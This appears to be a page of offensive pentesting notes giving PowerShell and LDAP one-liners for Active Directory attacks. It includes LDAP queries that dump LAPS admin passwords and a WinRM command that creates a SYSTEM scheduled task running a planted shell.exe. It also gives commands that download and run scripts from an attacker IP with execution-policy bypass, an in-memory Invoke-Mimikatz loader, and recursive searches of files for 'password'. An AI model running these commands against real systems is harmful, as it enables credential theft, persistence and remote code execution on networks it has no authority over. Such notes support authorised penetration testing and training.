# Quick Commands #### LDAP Search ```powershell ldapsearch -x -h IP -D '' -w '' -b "DC=DOMAIN,DC=DOMAIN" | grep sAMAccountName: ldapsearch -v -x -D USER@DOMAIN -w PASSWD -b "DC=DOMAIN,DC=DOMAIN" -h IP "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd ``` #### Run Command as User (winrm): ```powershell $pw = ConvertTo-SecureString "PASSWD" -AsPlainText -Force $creds = New-Object System.Management.Automation.PSCredential ("USER", $pw) Invoke-Command -Computer COMPUTER -ScriptBlock { schtasks /create /sc onstart /tn shell /tr C:\inetpub\wwwroot\shell.exe /ru SYSTEM } -Credential $creds Invoke-Command -Computer COMPUTER-ScriptBlock { schtasks /run /tn shell } -Credential $creds ``` #### Download file: ```powershell powershell -exec bypass -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.119.131/8888-198.ps1)" powershell -exec bypass -c IEX (iwr 'http://192.168.119.131/8888-198.ps1' -outfile 8888.ps1) ``` #### Download & Execute in memory: ```powershell powershell -exec bypass -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.119.131/8888-198.ps1, '.\8888-198.ps1')" IEX((New-Object System.Net.WebClient).downloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1')) ``` #### AD Users ```powershell Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl ``` #### Get Domain Machines / IPs ```powershell Get-ADComputer -Credential $cred -Server DC.Example.com -Filter 'operatingsystem -like "*Windows*" -and enabled -eq "true"' ` -Properties Name,Operatingsystem,OperatingSystemVersion,IPv4Address | Sort-Object -Property Operatingsystem | Select-Object -Property Name,Operatingsystem,OperatingSystemVersion,IPv4Address ``` **Powershell Grep Table** ```powershell Get-ChildItem -Recurse | Select-String "password" -List | Select Path | Format-Table -AutoSize ``` **Powershell Grep** ```powershell Get-ChildItem -Recurse | Select-String "password" -List | Select Path ``` **Get user groups** ```powershell Get-ADPrincipalGroupMembership username | select name ``` **Merge all csv to one** ```powershell Get-ChildItem -Filter *.csv | Select-Object -ExpandProperty FullName | Import-Csv | Export-Csv .\merged\merged.csv -NoTypeInformation -Append ``` **Get process using port** ```powershell # TCP Get-Process -Id (Get-NetTCPConnection -LocalPort 9095).OwningProcess # UDP Get-Process -Id (Get-NetUDPEndpoint -LocalPort 9095).OwningProcess ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://f1rstbyt3.gitbook.io/hacking-notes/misc/powershell/quick-commands.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.